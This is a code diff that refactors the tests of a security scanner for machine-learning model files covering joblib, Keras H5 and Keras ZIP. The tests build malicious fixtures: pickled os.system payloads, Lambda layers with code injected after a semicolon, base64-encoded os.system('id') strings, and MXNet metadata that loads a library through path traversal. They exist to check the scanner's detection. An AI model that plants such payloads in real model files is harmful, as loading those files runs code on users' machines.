_joblib_numpy_wrapper_control(shape=len(nested_pickle), dtype="u1").replace( b"NumpyArrayWrapper\n)\x81", b"NumpyArrayWrapper\n)R", @@ -1301,7 +1293,7 @@ def test_scan_rejects_invalid_numpy_wrapper_constructor_hiding_nested_pickle(tmp def test_scan_rejects_structured_object_dtype_hiding_nested_pickle(tmp_path: Path) -> None: - nested_pickle = pickle.dumps(_Payload(), protocol=2) + nested_pickle = pickle.dumps(SystemCommandPayload("echo owned"), protocol=2) dtype_control = _joblib_structured_object_dtype_control(len(nested_pickle)) wrapper_control = _joblib_numpy_wrapper_with_dtype_control(dtype_control) payload = b"\x80\x02](" + wrapper_control + nested_pickle + b"e." @@ -1586,7 +1578,7 @@ def finish_as_successful(self: PickleScanner, result: ScanResult, *, base_succes def test_scan_detects_gzip_compressed_pickle_joblib(tmp_path: Path) -> None: path = tmp_path / "gzip_protocol4.joblib" - path.write_bytes(gzip.compress(pickle.dumps(_Payload(), protocol=4))) + path.write_bytes(gzip.compress(pickle.dumps(SystemCommandPayload("echo owned"), protocol=4))) result = JoblibScanner().scan(str(path)) @@ -1603,7 +1595,7 @@ def test_scan_detects_gzip_compressed_pickle_joblib(tmp_path: Path) -> None: def test_scan_detects_bz2_compressed_pickle_joblib(tmp_path: Path) -> None: - payload = bz2.compress(pickle.dumps(_Payload(), protocol=4)) + payload = bz2.compress(pickle.dumps(SystemCommandPayload("echo owned"), protocol=4)) result = _scan_payload(tmp_path, payload, "bz2_protocol4.joblib") @@ -1612,7 +1604,7 @@ def test_scan_detects_bz2_compressed_pickle_joblib(tmp_path: Path) -> None: def test_scan_detects_lz4_compressed_pickle_joblib(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: - _install_fake_lz4(monkeypatch, {b"M": pickle.dumps(_Payload(), protocol=4)}) + _install_fake_lz4(monkeypatch, {b"M": pickle.dumps(SystemCommandPayload("echo owned"), protocol=4)}) result = _scan_payload(tmp_path, _LZ4_FRAME_MAGIC + b"M", "lz4_malicious.joblib") @@ -1676,7 +1668,7 @@ def test_lz4_compressed_malicious_joblib_produces_security_exit_code( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _install_fake_lz4(monkeypatch, {b"M": pickle.dumps(_Payload(), protocol=4)}) + _install_fake_lz4(monkeypatch, {b"M": pickle.dumps(SystemCommandPayload("echo owned"), protocol=4)}) path = tmp_path / "lz4_malicious.joblib" path.write_bytes(_LZ4_FRAME_MAGIC + b"M") @@ -1739,7 +1731,7 @@ def test_lz4_compressed_joblib_honors_decompression_limits( def test_lz4_joblib_rejects_unscanned_pickle_trailer(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> None: _install_fake_lz4(monkeypatch, {b"S": pickle.dumps({"safe": True}, protocol=4)}) path = tmp_path / "lz4_trailer.joblib" - path.write_bytes(_LZ4_FRAME_MAGIC + b"S" + pickle.dumps(_Payload(), protocol=0)) + path.write_bytes(_LZ4_FRAME_MAGIC + b"S" + pickle.dumps(SystemCommandPayload("echo owned"), protocol=0)) result = JoblibScanner().scan(str(path)) @@ -1757,7 +1749,7 @@ def test_lz4_joblib_does_not_accept_malicious_concatenated_frame( monkeypatch, { b"S": pickle.dumps({"safe": True}, protocol=4), - b"M": pickle.dumps(_Payload(), protocol=4), + b"M": pickle.dumps(SystemCommandPayload("echo owned"), protocol=4), }, ) path = tmp_path / "lz4_concatenated.joblib" @@ -1773,7 +1765,7 @@ def test_zip_routes_nested_lz4_joblib_to_embedded_pickle_analysis( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - _install_fake_lz4(monkeypatch, {b"M": pickle.dumps(_Payload(), protocol=4)}) + _install_fake_lz4(monkeypatch, {b"M": pickle.dumps(SystemCommandPayload("echo owned"), protocol=4)}) archive_path = tmp_path / "models.zip" with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("nested/model.joblib", _LZ4_FRAME_MAGIC + b"M") @@ -1785,7 +1777,9 @@ def test_zip_routes_nested_lz4_joblib_to_embedded_pickle_analysis( def test_scan_detects_bz_prefixed_raw_pickle_joblib(tmp_path: Path) -> None: - payload = b"B" + struct.pack(" None: def test_scan_detects_zlib_trailer_after_compressed_joblib_stream(tmp_path: Path) -> None: - payload = zlib.compress(pickle.dumps({"safe": [1, 2, 3]}, protocol=4)) + pickle.dumps(_Payload(), protocol=0) + payload = zlib.compress(pickle.dumps({"safe": [1, 2, 3]}, protocol=4)) + pickle.dumps( + SystemCommandPayload("echo owned"), protocol=0 + ) result = _scan_payload(tmp_path, payload, "zlib_trailer.joblib") @@ -1823,7 +1819,7 @@ def test_scan_reports_plain_text_joblib_without_critical_pickle_noise(tmp_path: def test_scan_file_routes_gzip_joblib_to_joblib_scanner(tmp_path: Path) -> None: path = tmp_path / "gzip_protocol4.joblib" - path.write_bytes(gzip.compress(pickle.dumps(_Payload(), protocol=4))) + path.write_bytes(gzip.compress(pickle.dumps(SystemCommandPayload("echo owned"), protocol=4))) result = scan_file(str(path), config={"cache_scan_results": False}) diff --git a/tests/scanners/test_keras_h5_scanner.py b/tests/scanners/test_keras_h5_scanner.py index a2f01537b..d2a11e819 100644 --- a/tests/scanners/test_keras_h5_scanner.py +++ b/tests/scanners/test_keras_h5_scanner.py @@ -12,6 +12,8 @@ import pytest +from tests.helpers.cache import assert_inconclusive_not_cached as _assert_inconclusive_keras_h5_scan_not_cached + # Skip if h5py is not available before importing it pytest.importorskip("h5py") @@ -2268,36 +2270,6 @@ def _assert_inconclusive_keras_h5_scan( assert core_module.determine_exit_code(audit_result) == 2 -def _assert_inconclusive_keras_h5_scan_not_cached(model_path: Path, reason: str, cache_dir: Path) -> None: - reset_cache_manager() - try: - first_result = core_module.scan_model_directory_or_file( - str(model_path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - ) - second_result = core_module.scan_model_directory_or_file( - str(model_path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - ) - - for audit_result in (first_result, second_result): - metadata = audit_result.file_metadata[str(model_path)] - assert core_module.determine_exit_code(audit_result) == 2 - assert metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert reason in metadata.get("scan_outcome_reasons") - assert not any( - issue.severity in (IssueSeverity.WARNING, IssueSeverity.CRITICAL) for issue in audit_result.issues - ) - - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - finally: - reset_cache_manager() - - @pytest.mark.parametrize( ("model_config", "reason", "expected_check_name", "expected_message_substring"), [ @@ -3452,33 +3424,9 @@ def test_lambda_whitespace_padded_safe_source_still_passes(tmp_path: Path) -> No def test_lambda_safe_prefix_with_injected_code_is_flagged(tmp_path: Path) -> None: """Semicolon-appended payloads must not bypass Lambda code safety checks.""" - model_path = create_custom_h5_file( - tmp_path, - { - "class_name": "Sequential", - "config": { - "name": "unsafe_lambda_model", - "layers": [ - { - "class_name": "Lambda", - "config": {"function": 'lambda x: x / 255; __import__("os").system("evil")'}, - } - ], - }, - }, - ) - - result = KerasH5Scanner().scan(str(model_path)) - # The injected payload must be flagged as dangerous, not allowlisted - assert any( - check.name == "Lambda Layer Code Analysis" and check.status == CheckStatus.FAILED for check in result.checks - ), f"Expected failed Lambda check but got: {[(c.name, c.status) for c in result.checks]}" - assert not any( - check.name == "Lambda Layer Code Analysis" - and check.status == CheckStatus.PASSED - and check.details.get("pattern_type") == "safe_normalization" - for check in result.checks + _assert_unsafe_lambda_expression( + tmp_path, ("unsafe_lambda_model"), ('lambda x: x / 255; __import__("os").system("evil")') ) @@ -3520,34 +3468,8 @@ def test_lambda_additional_safe_prefixes_with_injected_code_are_flagged( def test_lambda_tf_safe_prefix_with_exec_is_not_allowlisted(tmp_path: Path) -> None: """Safe tf.nn prefix should not match when arbitrary executable code is appended.""" - model_path = create_custom_h5_file( - tmp_path, - { - "class_name": "Sequential", - "config": { - "name": "unsafe_tf_lambda_model", - "layers": [ - { - "class_name": "Lambda", - "config": {"function": 'lambda x: tf.nn.softmax(x); exec("bad")'}, - } - ], - }, - }, - ) - - result = KerasH5Scanner().scan(str(model_path)) - # The injected payload must be flagged as dangerous, not allowlisted - assert any( - check.name == "Lambda Layer Code Analysis" and check.status == CheckStatus.FAILED for check in result.checks - ), f"Expected failed Lambda check but got: {[(c.name, c.status) for c in result.checks]}" - assert not any( - check.name == "Lambda Layer Code Analysis" - and check.status == CheckStatus.PASSED - and check.details.get("pattern_type") == "safe_normalization" - for check in result.checks - ) + _assert_unsafe_lambda_expression(tmp_path, ("unsafe_tf_lambda_model"), ('lambda x: tf.nn.softmax(x); exec("bad")')) @pytest.mark.parametrize( @@ -5398,82 +5320,19 @@ def test_lambda_serialized_auxiliary_callback_is_scanned(tmp_path: Path, callbac def test_lambda_dict_output_shape_is_scanned_without_legacy_type_marker(tmp_path: Path) -> None: - encoded_code = base64.b64encode(b"import os\nos.system('id')").decode() - model_path = create_custom_h5_file( + _assert_lambda_output_shape( tmp_path, - { - "class_name": "Sequential", - "config": { - "name": "dict_output_shape_model", - "layers": [ - { - "class_name": "Lambda", - "config": { - "name": "dict_output_shape", - "function": "relu", - "function_type": "function", - "module": "keras.activations", - "output_shape": { - "class_name": "__lambda__", - "config": {"code": encoded_code}, - }, - }, - } - ], - }, - }, - keras_version="3.11.3", - file_name="dict_output_shape.h5", - ) - - result = KerasH5Scanner().scan(str(model_path)) - - assert any( - check.name == "Lambda Layer Code Analysis" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details.get("layer_name") == "lambda_1.output_shape" - for check in result.checks + ("dict_output_shape_model"), + ("dict_output_shape"), + ("output_shape"), + ("dict_output_shape.h5"), + ("lambda_1.output_shape"), ) def test_lambda_dict_mask_without_legacy_type_marker_is_scanned(tmp_path: Path) -> None: - encoded_code = base64.b64encode(b"import os\nos.system('id')").decode() - model_path = create_custom_h5_file( - tmp_path, - { - "class_name": "Sequential", - "config": { - "name": "dict_mask_model", - "layers": [ - { - "class_name": "Lambda", - "config": { - "name": "dict_mask", - "function": "relu", - "function_type": "function", - "module": "keras.activations", - "mask": { - "class_name": "__lambda__", - "config": {"code": encoded_code}, - }, - }, - } - ], - }, - }, - keras_version="3.11.3", - file_name="dict_mask.h5", - ) - - result = KerasH5Scanner().scan(str(model_path)) - - assert any( - check.name == "Lambda Layer Code Analysis" - and check.status == CheckStatus.FAILED - and check.severity == IssueSeverity.CRITICAL - and check.details.get("layer_name") == "lambda_1.mask" - for check in result.checks + _assert_lambda_output_shape( + tmp_path, ("dict_mask_model"), ("dict_mask"), ("mask"), ("dict_mask.h5"), ("lambda_1.mask") ) @@ -7186,51 +7045,13 @@ def test_nested_non_lambda_serialized_function_is_critical(self, tmp_path: Path) assert cve_issues[0].details["module"] == "posix" def test_safe_keras_layer_module_is_not_flagged(self, tmp_path: Path) -> None: - model_path = create_custom_h5_file( - tmp_path, - { - "class_name": "Sequential", - "config": { - "name": "h5_safe_module", - "layers": [ - { - "class_name": "Dense", - "name": "dense_safe", - "module": "keras.layers", - "config": {"units": 1}, - } - ], - }, - }, - ) - - result = KerasH5Scanner().scan(str(model_path)) - - assert not any(issue.details.get("cve_id") == "CVE-2025-1550" for issue in result.issues) + _assert_safe_h5_module(tmp_path, ("h5_safe_module"), ("dense_safe"), ("keras.layers")) def test_non_callable_unknown_dense_module_is_not_flagged(self, tmp_path: Path) -> None: - model_path = create_custom_h5_file( - tmp_path, - { - "class_name": "Sequential", - "config": { - "name": "h5_unknown_dense_module", - "layers": [ - { - "class_name": "Dense", - "name": "dense_custom_module", - "module": "custom_project.layers", - "config": {"units": 1}, - } - ], - }, - }, + _assert_safe_h5_module( + tmp_path, ("h5_unknown_dense_module"), ("dense_custom_module"), ("custom_project.layers") ) - result = KerasH5Scanner().scan(str(model_path)) - - assert not any(issue.details.get("cve_id") == "CVE-2025-1550" for issue in result.issues) - class TestCVE20259905H5SafeMode: """Test CVE-2025-9905: Keras H5 safe_mode ignored for Lambda layers.""" @@ -7586,3 +7407,100 @@ def test_pep440_keras_versions_within_vulnerable_range_are_critical(self, tmp_pa assert len(cve_issues) >= 1, f"Expected CVE attribution for version {version}" assert all(i.severity == IssueSeverity.CRITICAL for i in cve_issues) assert all(i.details.get("parse_status") != "unknown" for i in cve_issues) + + +def _assert_safe_h5_module(tmp_path: Path, model_name: str, layer_name: str, module_name: str) -> None: + model_path = create_custom_h5_file( + tmp_path, + { + "class_name": "Sequential", + "config": { + "name": model_name, + "layers": [ + { + "class_name": "Dense", + "name": layer_name, + "module": module_name, + "config": {"units": 1}, + } + ], + }, + }, + ) + + result = KerasH5Scanner().scan(str(model_path)) + + assert not any(issue.details.get("cve_id") == "CVE-2025-1550" for issue in result.issues) + + +def _assert_unsafe_lambda_expression(tmp_path: Path, model_name: str, expression: str) -> None: + model_path = create_custom_h5_file( + tmp_path, + { + "class_name": "Sequential", + "config": { + "name": model_name, + "layers": [ + { + "class_name": "Lambda", + "config": {"function": expression}, + } + ], + }, + }, + ) + + result = KerasH5Scanner().scan(str(model_path)) + + # The injected payload must be flagged as dangerous, not allowlisted + assert any( + check.name == "Lambda Layer Code Analysis" and check.status == CheckStatus.FAILED for check in result.checks + ), f"Expected failed Lambda check but got: {[(c.name, c.status) for c in result.checks]}" + assert not any( + check.name == "Lambda Layer Code Analysis" + and check.status == CheckStatus.PASSED + and check.details.get("pattern_type") == "safe_normalization" + for check in result.checks + ) + + +def _assert_lambda_output_shape( + tmp_path: Path, model_name: str, layer_name: str, field_name: str, filename: str, location: str +) -> None: + encoded_code = base64.b64encode(b"import os\nos.system('id')").decode() + model_path = create_custom_h5_file( + tmp_path, + { + "class_name": "Sequential", + "config": { + "name": model_name, + "layers": [ + { + "class_name": "Lambda", + "config": { + "name": layer_name, + "function": "relu", + "function_type": "function", + "module": "keras.activations", + field_name: { + "class_name": "__lambda__", + "config": {"code": encoded_code}, + }, + }, + } + ], + }, + }, + keras_version="3.11.3", + file_name=filename, + ) + + result = KerasH5Scanner().scan(str(model_path)) + + assert any( + check.name == "Lambda Layer Code Analysis" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + and check.details.get("layer_name") == location + for check in result.checks + ) diff --git a/tests/scanners/test_keras_utils.py b/tests/scanners/test_keras_utils.py index 1ec555c40..15db30aeb 100644 --- a/tests/scanners/test_keras_utils.py +++ b/tests/scanners/test_keras_utils.py @@ -15,6 +15,7 @@ find_lambda_dangerous_patterns, is_known_safe_keras_layer_class, ) +from tests.helpers.text import LowerCountingText as _LowerCountingText @pytest.mark.parametrize( @@ -127,19 +128,6 @@ def test_h5_lambda_module_reference_redaction_preserves_severity() -> None: assert not any(check.severity == IssueSeverity.CRITICAL for check in safe_module_checks) -class _LowerCountingText(str): - lower_calls: int - - def __new__(cls, value: str) -> "_LowerCountingText": - instance = super().__new__(cls, value) - instance.lower_calls = 0 - return instance - - def lower(self) -> str: - self.lower_calls += 1 - return super().lower() - - def test_find_case_insensitive_substrings_reuses_lowered_text() -> None: text = _LowerCountingText("Exec once, leave eval absent") diff --git a/tests/scanners/test_keras_zip_scanner.py b/tests/scanners/test_keras_zip_scanner.py index 85e3d6662..9d103b944 100644 --- a/tests/scanners/test_keras_zip_scanner.py +++ b/tests/scanners/test_keras_zip_scanner.py @@ -8,7 +8,6 @@ """ import base64 -import builtins import json import marshal import stat @@ -34,6 +33,8 @@ from modelaudit.utils.file.hdf5 import HDF5_SIGNATURE_SCAN_MAX_BYTES, hdf5_metadata_checksum from modelaudit.utils.helpers import cache_decorator as cache_decorator_module from tests.helpers import create_mock_onnx, prefix_mock_onnx_with_unknown_field +from tests.helpers.cache import assert_inconclusive_not_cached as _assert_inconclusive_keras_zip_scan_not_cached +from tests.helpers.scanners import assert_preflighted_archive_survives_replacement try: import h5py @@ -41,6 +42,15 @@ h5py = None +class _CountingList(list[Any]): + item_iterations = 0 + + def __iter__(self) -> Iterator[Any]: + for item in super().__iter__(): + type(self).item_iterations += 1 + yield item + + def create_configured_keras_zip( tmp_path: Path, config: Any, @@ -98,36 +108,6 @@ def _assert_no_stale_inconclusive_metadata(result: ScanResult) -> None: assert "scan_outcome_reason" not in issue.details -def _assert_inconclusive_keras_zip_scan_not_cached(model_path: Path, reason: str, cache_dir: Path) -> None: - reset_cache_manager() - try: - first_result = scan_model_directory_or_file( - str(model_path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - ) - second_result = scan_model_directory_or_file( - str(model_path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - ) - - for audit_result in (first_result, second_result): - metadata = audit_result.file_metadata[str(model_path)] - assert determine_exit_code(audit_result) == 2 - assert metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert reason in metadata.get("scan_outcome_reasons") - assert not any( - issue.severity in (IssueSeverity.WARNING, IssueSeverity.CRITICAL) for issue in audit_result.issues - ) - - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - finally: - reset_cache_manager() - - def test_keras_zip_layer_counts_preserve_colliding_redacted_classes(tmp_path: Path) -> None: """Distinct model-controlled class names must not collapse into one count.""" first_secret = "sk-proj-" + "A" * 24 @@ -2132,35 +2112,9 @@ def test_recursive_member_scan_reuses_preflighted_archive_after_path_replacement archive.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) archive.writestr("payload.pkl", b'cos\nsystem\n(S"echo replacement"\ntR.') - original_scan_archive_members = keras_zip_scanner_module.ZipScanner.scan_archive_members - original_open = builtins.open - path_reopened = False - - def redirect_path_open(file: Any, *args: Any, **kwargs: Any) -> Any: - nonlocal path_reopened - if str(file) == str(keras_path): - path_reopened = True - file = replacement_path - return original_open(file, *args, **kwargs) - - def replace_then_scan( - scanner: keras_zip_scanner_module.ZipScanner, - path: str, - archive: zipfile.ZipFile | None = None, - ) -> ScanResult: - assert archive is not None - with monkeypatch.context() as path_swap: - path_swap.setattr(builtins, "open", redirect_path_open) - return original_scan_archive_members(scanner, path, archive=archive) - - monkeypatch.setattr(keras_zip_scanner_module.ZipScanner, "scan_archive_members", replace_then_scan) - - result = KerasZipScanner().scan(str(keras_path)) - - assert path_reopened is False - assert not any(issue.details.get("zip_entry") == "payload.pkl" for issue in result.issues) - assert any(entry.get("path", "").endswith(":safe.txt") for entry in result.metadata["contents"]) - assert not any(entry.get("path", "").endswith(":payload.pkl") for entry in result.metadata["contents"]) + assert_preflighted_archive_survives_replacement( + monkeypatch, keras_path, replacement_path, KerasZipScanner, keras_zip_scanner_module.ZipScanner + ) def test_read_failure_returns_inconclusive_exit2( self, @@ -2217,15 +2171,7 @@ def test_primary_failure_still_recurses_detectable_payload( archive.writestr("payload.pkl", b'cos\nsystem\n(S"echo pwned"\ntR.') if failure_kind == "read": - - def raise_os_error( - _self: KerasZipScanner, - _archive: zipfile.ZipFile, - _member_name: str, - ) -> None: - raise OSError("simulated Keras ZIP member read failure") - - monkeypatch.setattr(KerasZipScanner, "_get_archive_member_info", raise_os_error) + monkeypatch.setattr(KerasZipScanner, "_get_archive_member_info", _fail_keras_zip_member_read) else: def raise_runtime_error(_self: KerasZipScanner, _model_config: dict[str, Any], _result: Any) -> None: @@ -2263,15 +2209,7 @@ def test_primary_failure_does_not_cache_temporary_recursive_member( archive.writestr("payload.pkl", b"\x80\x04N.") if failure_kind == "read": - - def raise_os_error( - _self: KerasZipScanner, - _archive: zipfile.ZipFile, - _member_name: str, - ) -> None: - raise OSError("simulated Keras ZIP member read failure") - - monkeypatch.setattr(KerasZipScanner, "_get_archive_member_info", raise_os_error) + monkeypatch.setattr(KerasZipScanner, "_get_archive_member_info", _fail_keras_zip_member_read) else: def raise_runtime_error(_self: KerasZipScanner, _model_config: dict[str, Any], _result: Any) -> None: @@ -2913,23 +2851,15 @@ def test_scan_fails_closed_for_ambiguous_mxnet_symbol_disguised_as_metadata( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - keras_path = tmp_path / "ambiguous_mxnet_metadata.keras" - with zipfile.ZipFile(keras_path, "w") as zf: - zf.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) - zf.writestr( - "metadata.json", - '{"nodes":[{"op":"Custom","name":"load","attrs":"' - + ("x" * 129) - + '"},{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0],"heads":[[1,0,0]]}', - ) - - result = KerasZipScanner().scan(str(keras_path)) - - assert result.success is False - assert any( - check.name == "MXNet Symbol Routing" and check.status == CheckStatus.FAILED for check in result.checks + _assert_ambiguous_mxnet_metadata( + tmp_path, + monkeypatch, + ("ambiguous_mxnet_metadata.keras"), + ('{"nodes":[{"op":"Custom","name":"load","attrs":"'), + ( + '"},{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' + '"arg_nodes":[0],"heads":[[1,0,0]]}' + ), ) def test_scan_fails_closed_for_mxnet_node_object_before_metadata_padding( @@ -2937,23 +2867,15 @@ def test_scan_fails_closed_for_mxnet_node_object_before_metadata_padding( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - keras_path = tmp_path / "padded_node_mxnet_metadata.keras" - with zipfile.ZipFile(keras_path, "w") as zf: - zf.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) - zf.writestr( - "metadata.json", - '{"nodes":[{"attrs":"' - + ("x" * 129) - + '","op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0],"heads":[[0,0,0]]}', - ) - - result = KerasZipScanner().scan(str(keras_path)) - - assert result.success is False - assert any( - check.name == "MXNet Symbol Routing" and check.status == CheckStatus.FAILED for check in result.checks + _assert_ambiguous_mxnet_metadata( + tmp_path, + monkeypatch, + ("padded_node_mxnet_metadata.keras"), + ('{"nodes":[{"attrs":"'), + ( + '","op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' + '"arg_nodes":[0],"heads":[[0,0,0]]}' + ), ) @pytest.mark.parametrize("initial_nodes", ["[]", "null"]) @@ -2989,23 +2911,12 @@ def test_scan_fails_closed_for_mxnet_nodes_after_visible_head_metadata_padding( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - keras_path = tmp_path / "padded_mxnet_metadata.keras" - with zipfile.ZipFile(keras_path, "w") as zf: - zf.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) - zf.writestr( - "metadata.json", - '{"heads":[[0,0,0]],"padding":"' - + ("x" * 129) - + '","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0]}', - ) - - result = KerasZipScanner().scan(str(keras_path)) - - assert result.success is False - assert any( - check.name == "MXNet Symbol Routing" and check.status == CheckStatus.FAILED for check in result.checks + _assert_ambiguous_mxnet_metadata( + tmp_path, + monkeypatch, + ("padded_mxnet_metadata.keras"), + ('{"heads":[[0,0,0]],"padding":"'), + ('","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],"arg_nodes":[0]}'), ) def test_scan_fails_closed_for_mxnet_nodes_hidden_after_metadata_padding( @@ -3013,23 +2924,15 @@ def test_scan_fails_closed_for_mxnet_nodes_hidden_after_metadata_padding( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - keras_path = tmp_path / "hidden_mxnet_metadata.keras" - with zipfile.ZipFile(keras_path, "w") as zf: - zf.writestr("config.json", json.dumps({"class_name": "Sequential", "config": {"layers": []}})) - zf.writestr( - "metadata.json", - '{"padding":"' - + ("x" * 129) - + '","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0],"heads":[[0,0,0]]}', - ) - - result = KerasZipScanner().scan(str(keras_path)) - - assert result.success is False - assert any( - check.name == "MXNet Symbol Routing" and check.status == CheckStatus.FAILED for check in result.checks + _assert_ambiguous_mxnet_metadata( + tmp_path, + monkeypatch, + ("hidden_mxnet_metadata.keras"), + ('{"padding":"'), + ( + '","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' + '"arg_nodes":[0],"heads":[[0,0,0]]}' + ), ) def test_scan_does_not_suppress_mxnet_ambiguity_in_nested_archive( @@ -3853,27 +3756,7 @@ def test_stringlookup_remote_vocabulary_url_redacts_credentials(self, tmp_path: def test_stringlookup_relative_vocabulary_path_triggers_cve_2025_12058(self, tmp_path: Path) -> None: """Scalar relative vocabulary paths should be treated as external files.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "StringLookup", - "name": "string_lookup", - "config": {"vocabulary": "vocab.txt"}, - }, - ], - }, - } - - model_path = create_configured_keras_zip(tmp_path, config, keras_version="3.11.3") - result = scanner.scan(str(model_path)) - - assert any( - check.details.get("cve_id") == "CVE-2025-12058" and check.status == CheckStatus.FAILED - for check in result.checks - ) + _assert_relative_vocabulary_cve(tmp_path, ("vocab.txt")) def test_stringlookup_inline_vocabulary_list_stays_clean(self, tmp_path: Path) -> None: """Inline StringLookup vocabularies are benign and should not emit warnings.""" @@ -3986,27 +3869,7 @@ def test_stringlookup_external_vocabulary_path_unknown_version_is_warning_exit1( def test_stringlookup_windows_home_relative_path_is_detected(self, tmp_path: Path) -> None: """Windows-style home-relative vocabulary paths should be normalized and detected.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "StringLookup", - "name": "string_lookup", - "config": {"vocabulary": "~\\vocab.txt"}, - }, - ], - }, - } - - model_path = create_configured_keras_zip(tmp_path, config, keras_version="3.11.3") - result = scanner.scan(str(model_path)) - - assert any( - check.details.get("cve_id") == "CVE-2025-12058" and check.status == CheckStatus.FAILED - for check in result.checks - ) + _assert_relative_vocabulary_cve(tmp_path, ("~\\vocab.txt")) def test_stringlookup_prerelease_versions_treated_as_vulnerable(self, tmp_path: Path) -> None: """Prereleases of the fixed Keras version are still vulnerable.""" @@ -5558,31 +5421,7 @@ def test_compile_config_deduplicates_custom_object_identifiers_by_normalized_nam def test_registered_builtin_layer_does_not_false_positive(self, tmp_path: Path) -> None: """Built-in layers with registered_name metadata should remain clean.""" - scanner = KerasZipScanner() - config = { - "class_name": "Functional", - "config": { - "layers": [ - { - "class_name": "InputLayer", - "name": "input_1", - "config": {"batch_shape": [None, 4]}, - }, - { - "class_name": "Add", - "name": "add_1", - "module": "keras.src.ops.numpy", - "registered_name": "Add", - "config": {}, - }, - ] - }, - } - - result = scanner.scan(str(create_configured_keras_zip(tmp_path, config, file_name="builtin_registered.keras"))) - - assert all(check.name != "Custom Layer Class Detection" for check in result.checks) - assert all(check.name != "Custom Object Detection" for check in result.checks) + _assert_safe_registered_layer(tmp_path, ("Add"), ("add_1"), ("Add"), ("builtin_registered.keras")) def test_builtin_registered_name_with_non_allowlisted_module_is_flagged(self, tmp_path: Path) -> None: """Spoofed built-in registered names must not hide custom modules.""" @@ -5677,31 +5516,7 @@ def test_builtin_class_with_non_allowlisted_module_and_no_registered_name_is_fla def test_allowlisted_module_layer_does_not_false_positive(self, tmp_path: Path) -> None: """Layers from allowlisted Keras modules should not be treated as custom objects.""" - scanner = KerasZipScanner() - config = { - "class_name": "Functional", - "config": { - "layers": [ - { - "class_name": "InputLayer", - "name": "input_1", - "config": {"batch_shape": [None, 4]}, - }, - { - "class_name": "NotEqual", - "name": "not_equal", - "module": "keras.src.ops.numpy", - "registered_name": "NotEqual", - "config": {}, - }, - ] - }, - } - - result = scanner.scan(str(create_configured_keras_zip(tmp_path, config, file_name="allowlisted_module.keras"))) - - assert all(check.name != "Custom Layer Class Detection" for check in result.checks) - assert all(check.name != "Custom Object Detection" for check in result.checks) + _assert_safe_registered_layer(tmp_path, ("NotEqual"), ("not_equal"), ("NotEqual"), ("allowlisted_module.keras")) def test_allowlisted_registered_object_without_module_does_not_false_positive_custom_object( self, tmp_path: Path @@ -6301,6 +6116,27 @@ def test_native_module_with_unresolved_layer_symbol_is_not_critical( cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-1550"] assert all(issue.severity != IssueSeverity.CRITICAL for issue in cve_issues) + def _assert_safe_native_child(self, tmp_path: Path, module_value: str, layer_name: str) -> None: + scanner = KerasZipScanner() + config = { + "class_name": "Sequential", + "config": { + "layers": [ + { + "class_name": "Lambda", + "name": layer_name, + "config": {"fn_module": module_value}, + } + ] + }, + } + + result = scanner.scan(self._make_keras_zip(config, tmp_path)) + + cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-1550"] + assert cve_issues + assert all(issue.severity != IssueSeverity.CRITICAL for issue in cve_issues) + @pytest.mark.parametrize( "module_value", [ @@ -6328,25 +6164,7 @@ def test_native_extension_dotted_children_are_not_critical( module_value: str, ) -> None: """Native extension modules are not packages with importable dotted children.""" - scanner = KerasZipScanner() - config = { - "class_name": "Sequential", - "config": { - "layers": [ - { - "class_name": "Lambda", - "name": "native_child", - "config": {"fn_module": module_value}, - } - ] - }, - } - - result = scanner.scan(self._make_keras_zip(config, tmp_path)) - - cve_issues = [issue for issue in result.issues if issue.details.get("cve_id") == "CVE-2025-1550"] - assert cve_issues - assert all(issue.severity != IssueSeverity.CRITICAL for issue in cve_issues) + self._assert_safe_native_child(tmp_path, 